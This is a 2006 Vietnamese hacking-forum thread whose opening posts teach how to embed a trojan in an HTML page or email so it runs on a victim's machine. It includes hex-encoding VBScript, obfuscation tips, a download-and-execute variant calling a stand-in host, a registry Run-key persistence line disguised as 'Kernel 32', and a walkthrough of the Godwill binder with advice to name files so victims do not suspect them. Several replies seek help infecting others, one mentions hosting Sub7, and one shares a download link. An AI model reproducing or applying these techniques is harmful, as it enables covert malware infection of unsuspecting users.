banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Kĩ thuật gắn Trojan vào file HTML  XML
  [Question]   Kĩ thuật gắn Trojan vào file HTML 06/07/2006 07:56:46 (+0700) | #1 | 4359
[Avatar]
legendayhacker
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 06:00:41
Messages: 32
Location: legend
Offline
[Profile] [PM]
Tác giả:Một ai đó
Xin lỗi vì không rõ tác giả là ai. Vậy ai biết tác giả bài này thì điền hộ vào
mục tác giả.

Kĩ thuật gắn Trojan vào file HTML

Bạn muốn chạy tự động 1 trojan trên máy tính người khác khi họ xem trang Web hoặc Email của bạn...! Có cách nào không??? Dĩ nhiên là được rồi! Bài viết này sẽ giúp bạn giải quyết vấn đề!

1) Hướng dẫn:

· Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb. Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.com hoặc tự viết một file
trojan.exe để xài!

· Bước 2: chạy convert16.exe để convert file trojan.exe sang trojan.hex

· Bước 3: dùng 1 trình soạn thảo văn bản dạng text( nên dùng EditPlus, nó rất
hay!) để sửa file temp.htm như sau:

Thay phần .doc=”4D5A900... 64620000” thành .doc=”<đặt nội dung của file trojan.hex vào đây>” VD: .doc=”9631447da55abcd44ac25...”

· Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác!



2) Mã nguồn:



· Files:

§ tempsrc.hta dùng để extract và execute trojan.exe

§ tempsrc.htm file htm chính

§ convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex



· Những vấn đề chính:



§ Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe

Chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau:



Kí tự
L
P
T
V

C
l
u
b

2
0
0
1

Mã ANSI ở hệ 10
76
80
84
86
32
67
108
117
98
32
50
48
48
49

Mã ANSI ở hệ 16
4C
50
54
56
20
43
6C
75
62
20
32
30
30
31




Encode16 Decode16

“LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001”



‘--- VBScript Code ---



function encode16(st)

for i = 1 to len(st)

temp = hex((asc(mid(st,i,1)))

‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i

‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này

‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự

if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ...

temp =”0” & temp

end if

encode16 = encode16 & temp

next

end function



function decode16(st)

for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2

decode16 = decode16 & chr(“&h” & mid(st,i,2))

‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi

‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16

next

end function

‘--- VBScript Code ---



§ Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm



ü Mục đích:

+ giảm kích thước file

+ làm cho mã lệnh khó đọc đối với người khác



ü Ví dụ: thay vì viết lệnh rõ ràng:



on error resume next

dn=chr(34)

xd=vbcrlf

set wsh=createobject("wscript.shell")

set fso=createobject("scripting.filesystemobject")



Chúng ta cũng có thể viết lại như sau:



on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject")



Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không?



3) Hỏi/Đáp:



· Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không?



Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầu như đều là các file .exe chương trình có khả năng tự thực thi nên bạn hoàn toàn có thể thay đổi theo ý muốn của bạn!



· Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớn kinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ?



· Tôi muốn máy họ tự động download file trojan.exe từ trên mạng về và execute nó? Có được không?



Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe!

...

wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan

...



Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip



· Có thể chạy trojan.exe ngay sau khi người khác đọc trang Web hoặc Email mà không cần họ khởi động lại máy tính không?



Hoàn toàn có thể được! Nhưng trong phạm vi bài viết này, tôi không muốn đề cập đến!



Chúc các bạn thành công!
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 06/07/2006 08:15:28 (+0700) | #2 | 4367
[Avatar]
legendayhacker
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 06:00:41
Messages: 32
Location: legend
Offline
[Profile] [PM]
Tác giả : Một ai đó

Hướng dẫn sử dụng Godwill để gắn Trojan vào trang Web :
Godwill là một chương trình khá hữu dụng và dễ sử dụng dành cho mụch đích gắn kèm 1 file .exe( trojan) vào một trang web (htm.html)
Cách dùng xin tóm tắt như sau:

---===---
chạy chương trình chọn enter sau đó chọn nut "html" trong các nút ở dưới cùng cửa sổ godwill
Chọn "general options ( hinh 1 )

+enter exe file: path tới file trojan ( k2ps.exe )
+enter .html : trang web mà mình đã thiết kế
+enter output :tên trang web có đính mã godmessage ( ví dụ là : xxx.html thì sau khi hoàn tất sẽ xuất hiện file xxx.html ttrong thư mục godwill ,trang web này đã đính trojan không được mở
+các tuỳ chọn khác là dùng để thông báo về đường ICQ ...nếu là newbie thì không cần để ý cũng được ...
+browser wwwection : sau khi đọc trang web victim sẽ được chuyển về trang http://www.yahoo.com cung duoc
+HTA filename : sau khi xem trang web ,trong start-up của victim sẽ xuất hiện một file .HTA ,đặt tên file đó sao cho có vẻ "microsoft"một chút để victim khỏi nghi ngờ ( vd: msreg )
+sau đó chọn done
+phần advanced option không cần để ý cũng được.
+muốn save config hay không là tuỳ ý
nhấn nút có chữ "GEN" trang web có đính trojan sẽ được tạo ra
Have fun !
PS: trong godwill còn tích hợp một số tiện ích khác , các bạn tự tìm hiểu xem !!!
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 06/07/2006 10:05:49 (+0700) | #3 | 4390
[Avatar]
canhnguyen
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 22:51:45
Messages: 7
Offline
[Profile] [PM]
Bài này trong CD Viethacker ^^ không nhớ tác giả.
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 06/07/2006 10:26:17 (+0700) | #4 | 4392
hanhluckyly
Member

[Minus]    0    [Plus]
Joined: 05/07/2006 23:20:46
Messages: 2
Offline
[Profile] [PM]
Bạn legendayhacker mến

lỡ như mình có một con trojan có kích thước lớn hơn thì không thể dùng godwill được bạn có chương trình nào khác không?

ý mình là mình dùng con cs keyloggger ở chủ đề bên kia để nhúng vào godwill ấy nhưng nó báo là kích thước lớn hơn quy định

Cám ơn bạn rất nhiều
[Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 06/07/2006 11:15:04 (+0700) | #5 | 4398
[Avatar]
lonely_Xorhandsome
Elite Member

[Minus]    0    [Plus]
Joined: 26/06/2006 12:14:07
Messages: 558
Location: HCM beside you !
Offline
[Profile] [PM]
bài viết này của anh Lê Phạm Tuấn Vinh ( sinh vien báo chí) ! mình có đọc qua bài này lâu rồi không chú ý tới nó lằm hôm nay đọc lại thấy cũng hay hay , nhưng có điều mình thử tìm trong google chuong trình convert từ file EXE sang HEX ra nhiều kết wả tùm lum wa' bạn có thì share cho mọi người được không ạ ? , còn cái file temp.htm mà bạn nói đó là 1 file tạm khi làm việc với Editor phải không ? nhưng cụ thể là editor đang làm việc với file nào mà phát sinh ra file temp ? không lẽ file temp của 1 file HTML bất kì nào đó hả ??? mong bạn giải thích luôn a.! cảm ơn về bài viết .
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 08/07/2006 10:45:14 (+0700) | #6 | 5065
[Avatar]
ghostshadow189
Member

[Minus]    0    [Plus]
Joined: 23/08/2004 01:33:43
Messages: 59
Location: user 80183 of HVA
Offline
[Profile] [PM]
bạn à , bạn test cái cách này chưa vậy , có okie ko ???
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 09/07/2006 05:41:02 (+0700) | #7 | 5260
[Avatar]
romeowillkiss
Member

[Minus]    0    [Plus]
Joined: 13/04/2004 17:06:33
Messages: 33
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cách này giờ ko còn dùng được nữa
còn đòi hỏi victim có bật ActiveX ko nữa chứ , nếu victim ko bấm ok thì sao?
Notor Anti - Virus liệu có cho chạy ko?
sử dụng Trình duyệt Khác IE thì sao?

[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 09/07/2006 11:59:31 (+0700) | #8 | 5338
ZzzRockzzZ
Member

[Minus]    0    [Plus]
Joined: 01/05/2005 02:33:38
Messages: 1
Offline
[Profile] [PM]

legendayhacker wrote:
Tác giả : Một ai đó

Hướng dẫn sử dụng Godwill để gắn Trojan vào trang Web :
Godwill là một chương trình khá hữu dụng và dễ sử dụng dành cho mụch đích gắn kèm 1 file .exe( trojan) vào một trang web (htm.html)
Cách dùng xin tóm tắt như sau:

---===---
chạy chương trình chọn enter sau đó chọn nut "html" trong các nút ở dưới cùng cửa sổ godwill
Chọn "general options ( hinh 1 )

+enter exe file: path tới file trojan ( k2ps.exe )
+enter .html : trang web mà mình đã thiết kế
+enter output :tên trang web có đính mã godmessage ( ví dụ là : xxx.html thì sau khi hoàn tất sẽ xuất hiện file xxx.html ttrong thư mục godwill ,trang web này đã đính trojan không được mở
+các tuỳ chọn khác là dùng để thông báo về đường ICQ ...nếu là newbie thì không cần để ý cũng được ...
+browser wwwection : sau khi đọc trang web victim sẽ được chuyển về trang http://www.yahoo.com cung duoc
+HTA filename : sau khi xem trang web ,trong start-up của victim sẽ xuất hiện một file .HTA ,đặt tên file đó sao cho có vẻ "microsoft"một chút để victim khỏi nghi ngờ ( vd: msreg )
+sau đó chọn done
+phần advanced option không cần để ý cũng được.
+muốn save config hay không là tuỳ ý
nhấn nút có chữ "GEN" trang web có đính trojan sẽ được tạo ra
Have fun !
PS: trong godwill còn tích hợp một số tiện ích khác , các bạn tự tìm hiểu xem !!!
 

Godwill có hiệu lực với IE 6.0 ?! smilie :!:
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 10/07/2006 06:17:57 (+0700) | #9 | 5460
trojon
Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:36:06
Messages: 47
Offline
[Profile] [PM]
Bài viết này có rất nhiều trên mạng
cám ơn bạn đã share
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 11/07/2006 00:00:32 (+0700) | #10 | 5620
Master_ran
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 00:25:30
Messages: 4
Offline
[Profile] [PM]
cái này giờ còn dùng được sao hic>
chít liền
kiếm cái WMF
đoá :d
[Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 11/07/2006 06:49:21 (+0700) | #11 | 5741
HọcHackĐểHackBạnGái
Member

[Minus]    0    [Plus]
Joined: 10/07/2006 19:05:35
Messages: 2
Offline
[Profile] [PM]
Xin hỏi cái file temp.htm nó nằm ở đâu vậy?
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 15/07/2006 03:18:21 (+0700) | #12 | 6788
[Avatar]
louisenguyen
Member

[Minus]    0    [Plus]
Joined: 22/04/2005 16:53:40
Messages: 34
Location: Núi Võ Đang
Offline
[Profile] [PM]
hay hay em se thử smilie
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 17/07/2006 03:41:41 (+0700) | #13 | 7275
tuanlq1
Member

[Minus]    0    [Plus]
Joined: 17/01/2005 13:02:09
Messages: 5
Offline
[Profile] [PM]
cách này giờ hơi khó,nhưng tỉ lệ thành công chắc cũng dc 1-2 % ^_^
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 17/07/2006 05:24:59 (+0700) | #14 | 7291
trojon
Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:36:06
Messages: 47
Offline
[Profile] [PM]
Trước khi nhận xét 1 bài viết nào đó các bạn nên test thử xem thế nào.
[Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 22/07/2006 05:23:50 (+0700) | #15 | 8887
Loyal
Member

[Minus]    0    [Plus]
Joined: 18/01/2005 04:48:22
Messages: 18
Offline
[Profile] [PM]
cái này cũ rích rồi smilie) với tốc độ phát triển như bây giờ thì khó áp dụng được lắm :lolsmilie
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 22/07/2006 13:11:48 (+0700) | #16 | 9005
dbvn
Member

[Minus]    0    [Plus]
Joined: 20/07/2006 23:24:45
Messages: 24
Offline
[Profile] [PM]
ko down dc godwill nen chưa thử dc, có ai có, xin cho link down coi thử nó lợi hại đến đâu
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 22/07/2006 21:39:27 (+0700) | #17 | 9045
boyhuesd
Member

[Minus]    0    [Plus]
Joined: 30/06/2006 17:46:03
Messages: 7
Location: Bụng mẹ! :D
Offline
[Profile] [PM] [Yahoo!]
Em thấy một số site tự động down trojan về và chạy luôn, nếu mình không có cái cái avant browser cũng không thể biết được (ngay cả windows scurity0 cũng bó tay, mấy bác biết cách làm này khôn, xin chỉ giáo cho em
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 23/07/2006 08:05:25 (+0700) | #18 | 9183
mgdaubo
Member

[Minus]    0    [Plus]
Joined: 10/04/2006 03:24:04
Messages: 44
Offline
[Profile] [PM]
Vấn đề này mình thắc mắc lâu nay,virus thì đã viết xong mà cách lây nhiễm từ web thì tìm mãi chỉ thấy mấy cái cũ rích,bị fix lâu rồi. Pa nào giúp với
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 23/07/2006 12:15:43 (+0700) | #19 | 9234
[Avatar]
legendayhacker
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 06:00:41
Messages: 32
Location: legend
Offline
[Profile] [PM]

dbvn wrote:
ko down dc godwill nen chưa thử dc, có ai có, xin cho link down coi thử nó lợi hại đến đâu 

Đây link đây bạn thử coi .Tôi không khuyến khích bạn phá hoại hãy thử nên chính mình trước để xem kết quả là tốt nhất và để hiểu rõ cách thức của nó
http://www.remoteassessment.com/darchive/190982017.html
chúc vui
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 24/07/2006 13:54:56 (+0700) | #20 | 9509
microsoft_hn
Member

[Minus]    0    [Plus]
Joined: 23/07/2006 05:31:26
Messages: 11
Offline
[Profile] [PM]
Em cần hỏi rõ thêm một số điều nữa . Em nhấn mnhj là hỏi rõ thêm vì đa số mọi người là newbie mà anh mong anh chỉ bảo tận tình .Em định up con SUb7 lên host free của em trong phần data base !! Bây giờ không nhúng trojan vào nữa mà em muốn nhứng 1 đoạn code thực thi lệnh tự download trojan từ host free của em . và tự chạy trong HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32 được
Và máy victim có phát hiện ra trong quá trình download không . trong quá trình down và khi down về rùi mà họ có trương trình quét VR thì sao? khả năng có bị died con VR của mình không??



Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe!

...

wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan

...



Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 24/07/2006 13:56:11 (+0700) | #21 | 9510
microsoft_hn
Member

[Minus]    0    [Plus]
Joined: 23/07/2006 05:31:26
Messages: 11
Offline
[Profile] [PM]
em muốn anh chỉ rõ hơn
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 25/07/2006 02:56:57 (+0700) | #22 | 9639
peterhiep
Member

[Minus]    0    [Plus]
Joined: 24/07/2006 15:19:11
Messages: 5
Location: Korea
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Anh ơi em kô hiểu rõ lắm anh có thể chỉ rõ hơn một chút xíu được kô
[Up] [Print Copy]
  [Question]   Kĩ thuật gắn Trojan vào file HTML 25/07/2006 03:09:27 (+0700) | #23 | 9644
peterhiep
Member

[Minus]    0    [Plus]
Joined: 24/07/2006 15:19:11
Messages: 5
Location: Korea
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Mấy anh có thể chỉ em cách đính một con spy hay trojan vào một Website được kô em rất đang cần
[Up] [Print Copy]
  [Question]   Re: Kĩ thuật gắn Trojan vào file HTML 30/07/2006 07:51:38 (+0700) | #24 | 11028
[Avatar]
com_hacker
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 12:55:55
Messages: 34
Location: Đâu???
Offline
[Profile] [PM] [WWW] [Yahoo!]
Hic mấy anh ơi
Mấy cách nay em thử cả rồi nhưng không hiểu vì sao máy mình thì nó nhiễm lung tung còn máy net thì im re
VB script chắc không hiệu lực smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|